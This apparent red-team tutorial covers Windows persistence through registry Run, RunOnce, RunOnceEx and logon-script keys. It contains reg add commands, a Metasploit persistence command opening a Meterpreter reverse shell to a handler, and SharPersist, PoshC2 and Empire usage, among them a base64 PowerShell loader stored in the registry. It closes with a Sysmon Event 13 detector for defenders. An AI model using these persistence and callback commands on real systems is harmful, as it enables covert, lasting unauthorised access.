Getting an initial foothold inside a network during a red team operation is a time consuming task. Persistence is therefore key to a successful red team operation, as it enables the team to focus on the objectives of the engagement without losing communication with the command and control server.

Creating registry values that execute an arbitrary payload during Windows logon is one of the oldest tricks in the red team playbook. The technique only requires write access to one of the registry Run keys. Various threat actors and well known tools such as Metasploit, Empire and SharPersist provide this capability, so a mature SOC team should be able to detect this activity (registry writes to these keys are logged, for example, by Sysmon Event ID 13).

Terminal

Registry values can be added from the terminal to the Run keys to achieve persistence. Each value contains the path of the payload that will be executed when the user logs in. The following registry locations are known to be used by threat actors and red teams that use this method of persistence. Note that a value under RunOnce is deleted before it is executed, so it fires only once, and that RunServices and RunServicesOnce are Windows 9x/Me keys that NT-based Windows does not process: they still appear in many playbooks, but on a modern host only Run and RunOnce will execute the payload.

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
Registry – Run Keys Current User

If elevated credentials have been obtained it is preferable to use the Local Machine registry locations instead of the Current User ones, since writing to HKLM requires administrative privileges but the payload will then be executed whenever any user logs on to the system, not only the compromised account.

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
Registry – Run Keys Local Machine

At the next logon the payload is executed and calls back to the Meterpreter handler.

Meterpreter – Run Keys

Oddvar Moe documented two more registry locations that allow red teams to achieve persistence by executing either an arbitrary executable or loading a DLL: a numbered subkey under RunOnceEx (the value holds the path of the executable) and its Depend subkey (the value holds the path of a DLL that is loaded at logon). Both are processed during logon and, because they live under HKLM, require admin level privileges to create.

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.dll"
Meterpreter – Arbitrary DLL

Metasploit

Metasploit Framework supports persistence via the registry through a Meterpreter script and a post exploitation module. The Meterpreter script (now deprecated in favour of the post module) creates a payload in the form of a VBS script, drops it to disk and creates a registry value that runs the payload when the user logs on. In the command below -U installs the value in the current user's Run key, -P selects the payload, -i is the callback interval in seconds, and -p and -r are the port and address of the handler.

run persistence -U -P windows/x64/meterpreter/reverse_tcp -i 5 -p 443 -r 10.0.2.21
Metasploit – Meterpreter Persistence Script

The next time the user logs on to the system a new Meterpreter session will open.

Metasploit – Meterpreter Session

Alternatively there is a post exploitation module which can be used for persistence. The module requires the following configuration and will upload the executable given in REXEPATH to a writable location on the compromised system before registering it in the Run key.

use post/windows/manage/persistence_exe
set REXEPATH /tmp/pentestlab.exe
set SESSION 2
set STARTUP USER
set LOCALEXEPATH C:\\tmp
run
Metasploit – Persistence Post Exploitation Module Configuration

The module uses the Run key of the current user (HKCU) because STARTUP has been set to USER.

Metasploit – Persistence Post Exploitation Module

The module can be configured to create the registry value in the HKLM location if elevated (administrator or SYSTEM) privileges have been obtained. The STARTUP option needs to be changed to SYSTEM.

set STARTUP SYSTEM
Metasploit – Persistence Module as SYSTEM

SharPersist

SharPersist is a tool developed by Brett Hawkins in C# that combines a variety of persistence techniques, including the addition of registry run keys. Being a .NET assembly it can be run from command and control frameworks that support in-memory assembly execution, such as Cobalt Strike and PoshC2. The following command creates a registry value in the same location as the Metasploit modules above (the current user's Run key): -t selects the registry technique, -c and -a give the command and its arguments, -k the target key, -v the value name and -m add the action.

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c C:\tmp\pentestlab.exe" -k "hkcurun" -v "pentestlab" -m add
SharPersist – Registry as User

If elevated access has been obtained, the command can be modified to install the registry value in the Local Machine location (hklmrun) to achieve persistence for all users. The -o env option stores the value as REG_EXPAND_SZ so that environment variables in the command are expanded.

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c C:\tmp\pentestlab.exe" -k "hklmrun" -v "pentestlab" -m add -o env
SharPersist – Registry as SYSTEM

SharPersist also supports persistence via the RunOnce and RunOnceEx registry keys. The following commands create values in these locations that execute arbitrary payloads (note that the payload is given here without a path, so it must be on the PATH of the logon session).

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "hklmrunonce" -v "Pentestlab" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "hklmrunonceex" -v "Pentestlab" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "hkcurunonce" -v "Pentestlab" -m add
SharPersist – RunOnce Registry Key

SharPersist also provides an option to use another registry location for persistence: the UserInitMprLogonScript value under HKCU\Environment, which userinit.exe executes as a logon script when the user logs on.

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -k "logonscript" -m add
SharPersist – Logon Script

PoshC2

PoshC2 supports various persistence capabilities, including the registry run key method. The following command creates two registry values on the target host.

install-persistence
PoshC2 – Persistence

The value in the Run key is named IEUpdate in order to look legitimate; the payload itself is stored in a second value, named to look like a wallpaper setting, which the IEUpdate command reads and executes at logon.

PoshC2 – Registry Run Keys

Empire

Empire contains two modules for this technique, one for userland and one for elevated contexts. Depending on the level of privileges, these modules store a base64-encoded payload in a Debug value in one of the following registry locations:

  • HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug
  • HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug
Empire – Debug Registry Key Payload
usemodule persistence/userland/registry
usemodule persistence/elevated/registry*
Empire – Persistence Registry Module

A second value named Updater is created in the Run key and contains the command to execute: at the next logon PowerShell reads the base64 payload stored in the Debug value and runs it, achieving persistence.

  • HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Empire – Registry Run Key
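Every method on this page, from the plain reg add commands to the Empire modules, ends with a value written under one of a handful of registry keys, which is what a SOC can alert on. The following detector is an added example, not code from this post or from any of the tools it describes. It takes Sysmon Event ID 13 (RegistryEvent, Value Set) records and flags writes to each location discussed above: Run and RunOnce, RunOnceEx and its Depend subkey, the UserInitMprLogonScript value, and the Debug value that Empire uses as a payload stash together with its Updater loader. TargetObject, Details and Image are Sysmon's own EventData field names; the SID, the sample records and the indicator heuristics (which processes count as scripted writers, which paths count as user-writable) are constructed assumptions of this example.

```python
"""Flag registry writes to autostart locations in Sysmon Event ID 13 (Value Set) records.

Added example for this post, not code from the page or from any tool it describes.
TargetObject, Details and Image are Sysmon EventData field names; the sample
records and the SID below are constructed for the example.
"""
import re
from dataclasses import dataclass, field

# Sysmon logs HKCU writes as HKU\<SID>\..., so a user-hive write carries the SID.
HIVE_RE = re.compile(
    r"^(?P<hive>HKLM|HKU\\(?P<sid>S-1-5-\d+(?:-\d+)*)|HKCU|HKCR)\\(?P<path>.+)$", re.I)

CV = r"^software\\(?:wow6432node\\)?microsoft\\windows\\currentversion"
# (key path regex, value name regex or None, label); key path excludes hive and value name.
RULES = [(re.compile(k, re.I), re.compile(v, re.I) if v else None, label) for k, v, label in [
    (CV + r"\\run$", None, "Run"),
    (CV + r"\\runonce$", None, "RunOnce"),
    (CV + r"\\runonceex\\[^\\]+\\depend$", None, "RunOnceEx Depend (DLL load)"),
    (CV + r"\\runonceex\\[^\\]+$", None, "RunOnceEx"),
    # Empire stashes its base64 payload in a Debug value (or key) beside Run and reads it at logon.
    (CV + r"$", r"^debug$", "Debug (payload stash)"),
    (CV + r"\\debug$", None, "Debug (payload stash)"),
    # SharPersist's logonscript technique: the UserInitMprLogonScript value under HKCU\Environment.
    (r"^environment$", r"^userinitmprlogonscript$", "UserInitMprLogonScript"),
]]
# Writers that legitimate installers rarely use for autostart entries (heuristic assumption).
SCRIPT_WRITERS = {"reg.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe", "wscript.exe"}


@dataclass
class Finding:
    location: str       # which autostart location was written
    scope: str          # "machine" or "user:<SID>"
    value_name: str
    command: str        # Details: what will run at logon
    writer: str         # Image: the process that performed the write
    indicators: list = field(default_factory=list)


def split_target(target_object):
    """'HKU\\S-1-5-21-...\\Software\\...\\Run\\Name' -> (scope, key_path, value_name) or None."""
    m = HIVE_RE.match(target_object)
    if not m:
        return None
    key_path, _, value_name = m.group("path").rpartition("\\")
    if not key_path:
        return None  # a value directly under the hive root is never an autostart location
    hive = m.group("hive").split("\\")[0].upper()
    scope = "machine" if hive == "HKLM" else "user:" + (m.group("sid") or "current")
    return scope, key_path, value_name


def classify(event):
    """Return a Finding if this Value Set event targets an autostart location, else None."""
    if str(event.get("EventID", 13)) != "13":
        return None
    parsed = split_target(event["TargetObject"])
    if parsed is None:
        return None
    scope, key_path, value_name = parsed
    location = next((label for key_re, val_re, label in RULES
                     if key_re.match(key_path) and (val_re is None or val_re.match(value_name))), None)
    if location is None:
        return None
    details, image = event.get("Details", ""), event.get("Image", "")
    writer = image.rsplit("\\", 1)[-1].lower()
    indicators = []
    if writer in SCRIPT_WRITERS:
        indicators.append(f"written by {writer}")
    if re.search(r"frombase64string|\s-(?:enc|encodedcommand|e)\s", details, re.I):
        indicators.append("base64-encoded PowerShell loader")
    if re.search(r"\\(?:users|temp|tmp|appdata|programdata)\\", details, re.I):
        indicators.append("payload in user-writable path")
    if scope == "machine" and writer in SCRIPT_WRITERS:
        indicators.append("elevated write: persists for every user")
    return Finding(location, scope, value_name, details, image, indicators)


def scan(events):
    return [f for f in map(classify, events) if f is not None]


SID = "S-1-5-21-1004336348-1177238915-682003330-1001"  # constructed SID
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed records modelled on the commands in the post
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": "HKU\\" + SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\Pentestlab",
     "Details": r"C:\Users\pentestlab\pentestlab.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\Pentestlab",
     "Details": r"C:\tmp\pentestlab.dll"},
    {"EventID": 13, "Image": PS,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Debug",
     "Details": "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
    {"EventID": 13, "Image": PS,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": PS + r' -c "$x=(gp HKLM:Software\Microsoft\Windows\CurrentVersion Debug).Debug;powershell -Win Hidden -enc $x"'},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",  # unrelated write: must not fire
     "TargetObject": "HKU\\" + SID + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.location}] {f.scope} {f.value_name!r} via {f.writer}: {f.command[:60]} {f.indicators}")
```

Run against real data, each record would come from the EventData of a Sysmon Event ID 13 entry (for example exported from the Microsoft-Windows-Sysmon/Operational log). The rules deliberately match the key path and not the value name for Run, RunOnce and RunOnceEx, since names such as IEUpdate or Updater are chosen by the attacker; the value name only matters for the Debug and UserInitMprLogonScript cases, where the key itself is a normal one.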
